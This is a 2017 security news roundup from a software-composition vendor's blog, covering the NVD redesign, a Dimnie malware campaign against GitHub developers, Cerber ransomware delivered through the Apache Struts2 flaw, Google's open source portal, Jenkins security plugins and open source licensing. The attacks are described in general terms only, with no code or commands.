NVD's New Look, Struts Vuln Ransomware & Google Open Source Goodies

NVD Gets a New Look, Struts Vuln Ransomware, and Google Open Source Goodies

NIST redesigned the National Vulnerability Database with a much-needed, modernized look-and-feel — including a scrolling list of the latest scored vulnerabilities and a “visualization” section designed to provide different ways to look at the data. First impression? While some kinks still need to be worked out (the site loads very slowly), it’s going to be much easier to find vulnerability and mitigation information in the NVD than in the past.

Latest Scored Vulnerabilities in NVD

March 2017 closed out with 1347 entries, slightly higher than the average 1100 vulnerabilities usually reported per month. In other open source security and cybersecurity news:  Attackers have targeted developers on GitHub with an information-stealing program called Dimnie. Researchers have noticed new mutations in the attacks targeting the Apache Struts2 vulnerability. Google has put much of its open source in one easy-to-find place. Learn how to safeguard the software you develop from the start with these Jenkins plug-ins. Five ways to keep open source-based apps secure. Pain and confusion with open source licenses. And the top four software development methodologies.

Open Source Developers Targeted in Sophisticated Malware Attack

For the past few months, developers who publish their code on GitHub have been targeted in an attack campaign that uses a little-known but potent cyberespionage malware, reports PCWorld. Emails crafted to attract the attention of developers had .gz attachments that contained Word documents with malicious macro code attached. If allowed to execute, the macro code executed a PowerShell script that reached out to a remote server and downloaded a malware program known as Dimnie.

Cerber for Servers: Apache Struts2 Campaign Targets Servers with Ransomware

via SC Magazine UK: F5 Networks' researchers witnessed a campaign targeting the Apache Struts2 vulnerability pivot on 20 March and start delivering Cerber ransomware to servers. Cerber ransomware encrypts the files of its victims and charges them bitcoin to decrypt and regain access to them. It is apparently popular on Russian Underground forums and Malwarebytes called it “pretty powerful ransomware written with attention to detail.” The company touted its “rich customization options and various tricks to make analysis harder.”

Google Presents its Open Source Goodies to the World

via ZDnet: In a blog post, Will Norris, a software engineer at Google's Open Source Programs Office, wrote: "Free and open-source software has been part of our technical and organizational foundation since Google's early beginnings. From servers running the Linux kernel to an internal culture of being able to patch any other team's code, open source is part of everything we do. In return, we've released millions of lines of open-source code, run programs like Google Summer of Code and Google Code-in, and sponsor open-source projects and communities through organizations like Software Freedom Conservancy, the Apache Software Foundation, and many others."

And now, 18 years after Google was founded, Google has launched opensource.google.com. This site "ties together all of our initiatives with information on how we use, release, and support open source."

Jenkins Users Can Shore Up Software Security with Plugins

In an in-depth InfoWorld article, Fahmida Rashid looks at how you can safeguard the software you develop from the start with Jenkins plug-ins and integrations that automate security testing. For example, a Black Duck Hub plugin for Jenkins helps identify known vulnerabilities in open source components, set up open source security policies, identify license issues, and detect modified open source components.

5 Ways to Keep Open Source Based Apps Secure

Open source is used in numerous applications in all industries by organizations of all sizes. The reasons are straightforward: Using open source lowers development costs, speeds time to market, and accelerates innovation. More than 80 percent of all cyberattacks specifically target applications. The combination of these two facts—applications are the #1 target of cyberattacks and open source is the foundation of most of today’s application code—leads to the inevitable conclusion that open-source vulnerabilities are one of the biggest risks to application security.

Black Duck vice president of security strategy, Mike Pittenger, shares tips and best practices you can take now to manage open-source risks in TechBeacon.

Pain and Confusion with Open Source Licenses

Phil Odence, Black Duck vice president and general manager, shares his thoughts on Kyle Mitchell’s blog, Open Source License Business Perception Report.

“[Kyle] rates a list of popular licenses along two dimensions: Pain - how inconvenient they are to use; and Confusion - uncertainty in the meaning of their terms. He also includes some concise ‘Key Points’ about each. And, conveniently, he provided a link to the text of each license in the SPDX License List. (Kyle is an active contributor to the SPDX Legal Team.) The framework provides an interesting way to think about licenses and as input to developing an open source use policy or selecting a license for a project.”

Top 4 Software Development Methodologies

In order to manage a project efficiently, the manager or dev team must choose which software development method works best for the project at hand.  All of the numerous software development methodologies that exist are used for different reasons. Black Duck intern Tyler Hubbell has done some research to understand why different methodologies exist, and which ones are the most commonly used software development methodologies.

Watch a 3 Minute Demo of the Black Duck Hub

Sorry we missed you! We close comments for older posts, but we still want to hear from you. Tweet @black_duck_sw to continue the discussion.


Artifex Ruling, NY Cybersecurity Regs, PATCH Act, & WannaCry News

| May 19, 2017

This week’s news is dominated by fall-out and reaction from last week’s WannaCrypt/WannaCry attacks, of course, but other open source and cybersecurity stories you won’t want to miss include: An important open source ruling that confirms the enforceability of dual licensing. What New York’s new

| MORE >

Protecting Against Ransomware Like WannaCry Means Timely Patching

| May 16, 2017

According to the FBI, ransomware was the fastest-growing malware across all industries in 2016, and is on track to be an $1 billion crime in 2017. The “WannaCry ransomware” (aka “Wana Decrypt0r” “WCrypt” and “WannaCrypt” among ITS various other aliases) has affected an estimated 200,000 computers

| MORE >

Struts in VMware, Law Firm Cybersecurity, Hospital Data Breaches

| May 12, 2017

The need for cybersecurity vigilance is the overarching theme of this week’s news, as Google OSS-Fuzz finds more than 1,000 bugs, with 264 of them flagged as potential security bugs. The vuln that just keeps on strutting has impacted VMware products. Thousands of patient records are leaked in a

| MORE >